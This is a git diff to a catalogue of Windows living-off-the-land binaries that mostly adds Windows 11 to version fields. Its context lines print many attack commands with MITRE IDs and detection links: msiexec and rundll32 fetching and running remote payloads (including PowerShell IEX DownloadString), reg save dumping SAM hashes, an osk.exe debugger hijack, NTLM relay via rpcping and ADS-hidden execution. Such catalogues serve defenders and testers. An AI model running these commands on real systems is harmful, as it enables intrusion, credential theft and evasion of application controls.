a/yml/OSBinaries/Msiexec.yml +++ b/yml/OSBinaries/Msiexec.yml @@ -10,28 +10,28 @@ Commands: Category: Execute Privileges: User MitreID: T1218.007 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: msiexec /q /i http://192.168.100.3/tmp/cmd.png Description: Installs the target remote & renamed .MSI file silently. Usecase: Execute custom made msi file with attack code from remote server Category: Execute Privileges: User MitreID: T1218.007 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: msiexec /y "C:\folder\evil.dll" Description: Calls DLLRegisterServer to register the target DLL. Usecase: Execute dll files Category: Execute Privileges: User MitreID: T1218.007 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: msiexec /z "C:\folder\evil.dll" Description: Calls DLLRegisterServer to un-register the target DLL. Usecase: Execute dll files Category: Execute Privileges: User MitreID: T1218.007 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\msiexec.exe - Path: C:\Windows\SysWOW64\msiexec.exe diff --git a/yml/OSBinaries/Netsh.yml b/yml/OSBinaries/Netsh.yml index b8f459c..969d433 100644 --- a/yml/OSBinaries/Netsh.yml +++ b/yml/OSBinaries/Netsh.yml @@ -10,7 +10,7 @@ Commands: Category: Execute Privileges: User MitreID: T1546.007 - OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\WINDOWS\System32\Netsh.exe - Path: C:\WINDOWS\SysWOW64\Netsh.exe diff --git a/yml/OSBinaries/Odbcconf.yml b/yml/OSBinaries/Odbcconf.yml index 7163688..07cd750 100644 --- a/yml/OSBinaries/Odbcconf.yml +++ b/yml/OSBinaries/Odbcconf.yml @@ -10,14 +10,14 @@ Commands: Category: Execute Privileges: User MitreID: T1218.008 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: odbcconf /a {REGSVR c:\test\test.dll} Description: Execute DllREgisterServer from DLL specified. Usecase: Execute dll file using technique that can evade defensive counter measures Category: Execute Privileges: User MitreID: T1218.008 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\odbcconf.exe - Path: C:\Windows\SysWOW64\odbcconf.exe diff --git a/yml/OSBinaries/OfflineScannerShell.yml b/yml/OSBinaries/OfflineScannerShell.yml index e12ad2c..966fe84 100644 --- a/yml/OSBinaries/OfflineScannerShell.yml +++ b/yml/OSBinaries/OfflineScannerShell.yml @@ -10,7 +10,7 @@ Commands: Category: Execute Privileges: Administrator MitreID: T1218 - OperatingSystem: Windows 10 + OperatingSystem: Windows 10, Windows 11 Full_Path: - Path: C:\Program Files\Windows Defender\Offline\OfflineScannerShell.exe Detection: diff --git a/yml/OSBinaries/Pcalua.yml b/yml/OSBinaries/Pcalua.yml index e61cf7b..d47f1de 100644 --- a/yml/OSBinaries/Pcalua.yml +++ b/yml/OSBinaries/Pcalua.yml @@ -10,7 +10,7 @@ Commands: Category: Execute Privileges: User MitreID: T1202 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: pcalua.exe -a \\server\payload.dll Description: Open the target .DLL file with the Program Compatibilty Assistant. Usecase: Proxy execution of remote dll file @@ -24,7 +24,7 @@ Commands: Category: Execute Privileges: User MitreID: T1202 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\pcalua.exe Code_Sample: diff --git a/yml/OSBinaries/Pcwrun.yml b/yml/OSBinaries/Pcwrun.yml index e1bdc30..f40ee01 100644 --- a/yml/OSBinaries/Pcwrun.yml +++ b/yml/OSBinaries/Pcwrun.yml @@ -10,7 +10,7 @@ Commands: Category: Execute Privileges: User MitreID: T1218 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\pcwrun.exe Code_Sample: diff --git a/yml/OSBinaries/Print.yml b/yml/OSBinaries/Print.yml index ed0405a..a93f50d 100644 --- a/yml/OSBinaries/Print.yml +++ b/yml/OSBinaries/Print.yml @@ -10,21 +10,21 @@ Commands: Category: ADS Privileges: User MitreID: T1564.004 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: print /D:C:\ADS\CopyOfFile.exe C:\ADS\FileToCopy.exe Description: Copy FileToCopy.exe to the target C:\ADS\CopyOfFile.exe Usecase: Copy files Category: Copy Privileges: User MitreID: T1105 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: print /D:C:\OutFolder\outfile.exe \\WebDavServer\Folder\File.exe Description: Copy File.exe from a network share to the target c:\OutFolder\outfile.exe. Usecase: Copy/Download file from remote server Category: Copy Privileges: User MitreID: T1105 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\print.exe - Path: C:\Windows\SysWOW64\print.exe diff --git a/yml/OSBinaries/PrintBrm.yml b/yml/OSBinaries/PrintBrm.yml index ab90165..033961e 100644 --- a/yml/OSBinaries/PrintBrm.yml +++ b/yml/OSBinaries/PrintBrm.yml @@ -10,14 +10,14 @@ Commands: Category: Download Privileges: User MitreID: T1105 - OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: PrintBrm -r -f C:\Users\user\Desktop\data.txt:hidden.zip -d C:\Users\user\Desktop\new_folder Description: Extract the contents of a ZIP file stored in an Alternate Data Stream (ADS) and store it in a folder Usecase: Decompress and extract a ZIP file stored on an alternate data stream to a new folder Category: ADS Privileges: User MitreID: T1564.004 - OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\spool\tools\PrintBrm.exe Detection: diff --git a/yml/OSBinaries/Reg.yml b/yml/OSBinaries/Reg.yml index 3e0443b..6ca8ef4 100644 --- a/yml/OSBinaries/Reg.yml +++ b/yml/OSBinaries/Reg.yml @@ -10,14 +10,14 @@ Commands: Category: ADS Privileges: User MitreID: T1564.004 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: reg save HKLM\SECURITY c:\test\security.bak && reg save HKLM\SYSTEM c:\test\system.bak && reg save HKLM\SAM c:\test\sam.bak Description: Dump registry hives (SAM, SYSTEM, SECURITY) to retrieve password hashes and key material Usecase: Dump credentials from the Security Account Manager (SAM) Category: Credentials Privileges: Administrator MitreID: T1003.002 - OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\reg.exe - Path: C:\Windows\SysWOW64\reg.exe diff --git a/yml/OSBinaries/Regasm.yml b/yml/OSBinaries/Regasm.yml index 5aa2b44..080b310 100644 --- a/yml/OSBinaries/Regasm.yml +++ b/yml/OSBinaries/Regasm.yml @@ -10,14 +10,14 @@ Commands: Category: AWL bypass Privileges: Local Admin MitreID: T1218.009 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: regasm.exe /U AllTheThingsx64.dll Description: Loads the target .DLL file and executes the UnRegisterClass function. Usecase: Execute code and bypass Application whitelisting Category: Execute Privileges: User MitreID: T1218.009 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe diff --git a/yml/OSBinaries/Regedit.yml b/yml/OSBinaries/Regedit.yml index 3febc17..3868fd5 100644 --- a/yml/OSBinaries/Regedit.yml +++ b/yml/OSBinaries/Regedit.yml @@ -10,14 +10,14 @@ Commands: Category: ADS Privileges: User MitreID: T1564.004 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: regedit C:\ads\file.txt:regfile.reg Description: Import the target .REG file into the Registry. Usecase: Import hidden registry data from alternate data stream Category: ADS Privileges: User MitreID: T1564.004 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\regedit.exe - Path: C:\Windows\SysWOW64\regedit.exe diff --git a/yml/OSBinaries/Regini.yml b/yml/OSBinaries/Regini.yml index a19af48..c193019 100644 --- a/yml/OSBinaries/Regini.yml +++ b/yml/OSBinaries/Regini.yml @@ -10,7 +10,7 @@ Commands: Category: ADS Privileges: User MitreID: T1564.004 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\regini.exe - Path: C:\Windows\SysWOW64\regini.exe diff --git a/yml/OSBinaries/Register-cimprovider.yml b/yml/OSBinaries/Register-cimprovider.yml index d7543ab..9971e61 100644 --- a/yml/OSBinaries/Register-cimprovider.yml +++ b/yml/OSBinaries/Register-cimprovider.yml @@ -10,7 +10,7 @@ Commands: Category: Execute Privileges: User MitreID: T1218 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\Register-cimprovider.exe - Path: C:\Windows\SysWOW64\Register-cimprovider.exe diff --git a/yml/OSBinaries/Regsvcs.yml b/yml/OSBinaries/Regsvcs.yml index 5b8f856..bc2aa44 100644 --- a/yml/OSBinaries/Regsvcs.yml +++ b/yml/OSBinaries/Regsvcs.yml @@ -10,14 +10,14 @@ Commands: Category: Execute Privileges: Local Admin MitreID: T1218.009 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: regsvcs.exe AllTheThingsx64.dll Description: Loads the target .DLL file and executes the RegisterClass function. Usecase: Execute dll file and bypass Application whitelisting Category: AWL bypass Privileges: Local Admin MitreID: T1218.009 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\regsvcs.exe - Path: C:\Windows\SysWOW64\regsvcs.exe diff --git a/yml/OSBinaries/Regsvr32.yml b/yml/OSBinaries/Regsvr32.yml index 08a9e44..258ac4b 100644 --- a/yml/OSBinaries/Regsvr32.yml +++ b/yml/OSBinaries/Regsvr32.yml @@ -10,28 +10,28 @@ Commands: Category: AWL bypass Privileges: User MitreID: T1218.010 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: regsvr32.exe /s /u /i:file.sct scrobj.dll Description: Execute the specified local .SCT script with scrobj.dll. Usecase: Execute code from scriptlet, bypass Application whitelisting Category: AWL bypass Privileges: User MitreID: T1218.010 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll Description: Execute the specified remote .SCT script with scrobj.dll. Usecase: Execute code from remote scriptlet, bypass Application whitelisting Category: Execute Privileges: User MitreID: T1218.010 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: regsvr32.exe /s /u /i:file.sct scrobj.dll Description: Execute the specified local .SCT script with scrobj.dll. Usecase: Execute code from scriptlet, bypass Application whitelisting Category: Execute Privileges: User MitreID: T1218.010 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\regsvr32.exe - Path: C:\Windows\SysWOW64\regsvr32.exe diff --git a/yml/OSBinaries/Replace.yml b/yml/OSBinaries/Replace.yml index 41e3b1e..7b1b57d 100644 --- a/yml/OSBinaries/Replace.yml +++ b/yml/OSBinaries/Replace.yml @@ -10,14 +10,14 @@ Commands: Category: Copy Privileges: User MitreID: T1105 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: replace.exe \\webdav.host.com\foo\bar.exe c:\outdir /A Description: Download/Copy bar.exe to outdir Usecase: Download file Category: Download Privileges: User MitreID: T1105 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\replace.exe - Path: C:\Windows\SysWOW64\replace.exe diff --git a/yml/OSBinaries/Rpcping.yml b/yml/OSBinaries/Rpcping.yml index 9f6d1bc..f796d04 100644 --- a/yml/OSBinaries/Rpcping.yml +++ b/yml/OSBinaries/Rpcping.yml @@ -10,14 +10,14 @@ Commands: Category: Credentials Privileges: User MitreID: T1003 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: rpcping /s 10.0.0.35 /e 9997 /a connect /u NTLM Description: Trigger an authenticated RPC call to the target server (/s) that could be relayed to a privileged resource (Sign not Set). Usecase: Relay a NTLM authentication over RPC (ncacn_ip_tcp) on a custom port Category: Credentials Privileges: User MitreID: T1187 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\rpcping.exe - Path: C:\Windows\SysWOW64\rpcping.exe diff --git a/yml/OSBinaries/Rundll32.yml b/yml/OSBinaries/Rundll32.yml index bd8acc1..568f322 100644 --- a/yml/OSBinaries/Rundll32.yml +++ b/yml/OSBinaries/Rundll32.yml @@ -10,56 +10,56 @@ Commands: Category: Execute Privileges: User MitreID: T1218.011 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: rundll32.exe \\10.10.10.10\share\payload.dll,EntryPoint Description: Use Rundll32.exe to execute a DLL from a SMB share. EntryPoint is the name of the entry point in the .DLL file to execute. Usecase: Execute DLL from SMB share. Category: Execute Privileges: User MitreID: T1218.011 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');" Description: Use Rundll32.exe to execute a JavaScript script that runs a PowerShell script that is downloaded from a remote web site. Usecase: Execute code from Internet Category: Execute Privileges: User MitreID: T1218.011 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new%20ActiveXObject(\"WScript.Shell\");w.run(\"calc\");window.close()"); Description: Use Rundll32.exe to execute a JavaScript script that runs calc.exe. Usecase: Proxy execution Category: Execute Privileges: User MitreID: T1218.011 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);} Description: Use Rundll32.exe to execute a JavaScript script that runs calc.exe and then kills the Rundll32.exe process that was started. Usecase: Proxy execution Category: Execute Privileges: User MitreID: T1218.011 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/master/test") Description: Use Rundll32.exe to execute a JavaScript script that calls a remote JavaScript script. Usecase: Execute code from Internet Category: Execute Privileges: User MitreID: T1218.011 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: rundll32 "C:\ads\file.txt:ADSDLL.dll",DllMain Description: Use Rundll32.exe to execute a .DLL file stored in an Alternate Data Stream (ADS). Usecase: Execute code from alternate data stream Category: ADS Privileges: User MitreID: T1564.004 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: rundll32.exe -sta {CLSID} Description: Use Rundll32.exe to load a registered or hijacked COM Server payload. Also works with ProgID. Usecase: Execute a DLL/EXE COM server payload or ScriptletURL code. Category: Execute Privileges: User MitreID: T1218.011 - OperatingSystem: Windows 10 (and likely previous versions) + OperatingSystem: Windows 10 (and likely previous versions), Windows 11 Full_Path: - Path: C:\Windows\System32\rundll32.exe - Path: C:\Windows\SysWOW64\rundll32.exe diff --git a/yml/OSBinaries/Runonce.yml b/yml/OSBinaries/Runonce.yml index 0190d5c..c6dab01 100644 --- a/yml/OSBinaries/Runonce.yml +++ b/yml/OSBinaries/Runonce.yml @@ -10,7 +10,7 @@ Commands: Category: Execute Privileges: Administrator MitreID: T1218 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\runonce.exe - Path: C:\Windows\SysWOW64\runonce.exe diff --git a/yml/OSBinaries/Sc.yml b/yml/OSBinaries/Sc.yml index 3f6fcf3..5ec954d 100644 --- a/yml/OSBinaries/Sc.yml +++ b/yml/OSBinaries/Sc.yml @@ -10,14 +10,14 @@ Commands: Category: ADS Privileges: User MitreID: T1564.004 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: sc config binPath="\"c:\\ADS\\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" & sc start Description: Modifies an existing service and executes the file stored in the ADS. Usecase: Execute binary file hidden inside an alternate data stream Category: ADS Privileges: User MitreID: T1564.004 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\sc.exe - Path: C:\Windows\SysWOW64\sc.exe diff --git a/yml/OSBinaries/Schtasks.yml b/yml/OSBinaries/Schtasks.yml index 4f3e5b5..a176de6 100644 --- a/yml/OSBinaries/Schtasks.yml +++ b/yml/OSBinaries/Schtasks.yml @@ -11,13 +11,13 @@ Commands: Privileges: User MitreID: T1053.005 OperatingSystem: Windows - - Command: schtasks /create /s targetmachine /tn "MyTask" /tr c:\some\directory\notevil.exe /sc daily + - Command: schtasks /create /s targetmachine /tn "MyTask" /tr c:\some\directory\notevil.exe /sc daily Description: Create a scheduled task on a remote computer for persistence/lateral movement Usecase: Create a remote task to run daily relative to the the time of creation Category: Execute Privileges: Administrator MitreID: T1053.005 - OperatingSystem: Windows + OperatingSystem: Windows 10, Windows 11 Full_Path: - Path: c:\windows\system32\schtasks.exe - Path: c:\windows\syswow64\schtasks.exe diff --git a/yml/OSBinaries/Scriptrunner.yml b/yml/OSBinaries/Scriptrunner.yml index 41def89..73f8752 100644 --- a/yml/OSBinaries/Scriptrunner.yml +++ b/yml/OSBinaries/Scriptrunner.yml @@ -10,14 +10,14 @@ Commands: Category: Execute Privileges: User MitreID: T1202 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: ScriptRunner.exe -appvscript "\\fileserver\calc.cmd" Description: Executes calc.cmd from remote server Usecase: Execute binary through proxy binary from external server to evade defensive counter measures Category: Execute Privileges: User MitreID: T1218 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\scriptrunner.exe - Path: C:\Windows\SysWOW64\scriptrunner.exe diff --git a/yml/OSBinaries/Stordiag.yml b/yml/OSBinaries/Stordiag.yml index 8d2b315..fdd8ef0 100644 --- a/yml/OSBinaries/Stordiag.yml +++ b/yml/OSBinaries/Stordiag.yml @@ -10,7 +10,7 @@ Commands: Category: Execute Privileges: User MitreID: T1218 - OperatingSystem: Windows 10 + OperatingSystem: Windows 10, Windows 11 Full_Path: - Path: c:\windows\system32\stordiag.exe - Path: c:\windows\syswow64\stordiag.exe diff --git a/yml/OSBinaries/Verclsid.yml b/yml/OSBinaries/Verclsid.yml index bf5280a..d4e5a4a 100644 --- a/yml/OSBinaries/Verclsid.yml +++ b/yml/OSBinaries/Verclsid.yml @@ -10,7 +10,7 @@ Commands: Category: Execute Privileges: User MitreID: T1218.012 - OperatingSystem: Windows 10 + OperatingSystem: Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\verclsid.exe - Path: C:\Windows\SysWOW64\verclsid.exe diff --git a/yml/OSBinaries/Wab.yml b/yml/OSBinaries/Wab.yml index a3652cf..6015cda 100644 --- a/yml/OSBinaries/Wab.yml +++ b/yml/OSBinaries/Wab.yml @@ -10,7 +10,7 @@ Commands: Category: Execute Privileges: Administrator MitreID: T1218 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Program Files\Windows Mail\wab.exe - Path: C:\Program Files (x86)\Windows Mail\wab.exe diff --git a/yml/OSBinaries/Wmic.yml b/yml/OSBinaries/Wmic.yml index f4271e9..ac38398 100644 --- a/yml/OSBinaries/Wmic.yml +++ b/yml/OSBinaries/Wmic.yml @@ -10,28 +10,28 @@ Commands: Category: ADS Privileges: User MitreID: T1564.004 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: wmic.exe process call create calc Description: Execute calc from wmic Usecase: Execute binary from wmic to evade defensive counter measures Category: Execute Privileges: User MitreID: T1218 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: wmic.exe process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f" Description: Add cmd.exe as a debugger for the osk.exe process. Each time osk.exe is run, cmd.exe will be run as well. Usecase: Execute binary by manipulate the debugger for a program to evade defensive counter measures Category: Execute Privileges: User MitreID: T1218 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: wmic.exe /node:"192.168.0.1" process call create "evil.exe" Description: Execute evil.exe on the remote system. Usecase: Execute binary on a remote system Category: Execute Privileges: User MitreID: T1218 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: wmic.exe /node:REMOTECOMPUTERNAME PROCESS call create "at 9:00PM c:\GoogleUpdate.exe ^> c:\notGoogleUpdateResults.txt" Description: Create a scheduled execution of C:\GoogleUpdate.exe to run at 9pm. Usecase: Execute binary with scheduled task created with wmic on a remote computer @@ -52,14 +52,14 @@ Commands: Category: Execute Privileges: User MitreID: T1218 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: wmic.exe process get brief /format:"\\127.0.0.1\c$\Tools\pocremote.xsl" Description: Executes JScript or VBScript embedded in the target remote XSL stylsheet. Usecase: Execute script from remote system Category: Execute Privileges: User MitreID: T1218 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\wbem\wmic.exe - Path: C:\Windows\SysWOW64\wbem\wmic.exe diff --git a/yml/OSBinaries/WorkFolders.yml b/yml/OSBinaries/WorkFolders.yml index 6d271a1..00b3f33 100644 --- a/yml/OSBinaries/WorkFolders.yml +++ b/yml/OSBinaries/WorkFolders.yml @@ -10,7 +10,7 @@ Commands: Category: Execute Privileges: User MitreID: T1218 - OperatingSystem: Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\WorkFolders.exe Detection: diff --git a/yml/OSBinaries/Wscript.yml b/yml/OSBinaries/Wscript.yml index e24f33f..b1b8b54 100644 --- a/yml/OSBinaries/Wscript.yml +++ b/yml/OSBinaries/Wscript.yml @@ -10,14 +10,14 @@ Commands: Category: ADS Privileges: User MitreID: T1564.004 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: echo GetObject("script:https://raw.githubusercontent.com/sailay1996/misc-bin/master/calc.js") > %temp%\test.txt:hi.js && wscript.exe %temp%\test.txt:hi.js Description: Download and execute script stored in an alternate data stream Usecase: Execute hidden code to evade defensive counter measures Category: ADS Privileges: User MitreID: T1564.004 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\wscript.exe - Path: C:\Windows\SysWOW64\wscript.exe @@ -31,7 +31,7 @@ Detection: - Elastic: https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/command_and_control_remote_file_copy_scripts.toml - Elastic: https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml - Splunk: https://github.com/splunk/security_content/blob/a1afa0fa605639cbef7d528dec46ce7c8112194a/detections/endpoint/wscript_or_cscript_suspicious_child_process.yml - - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules + - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules - IOC: 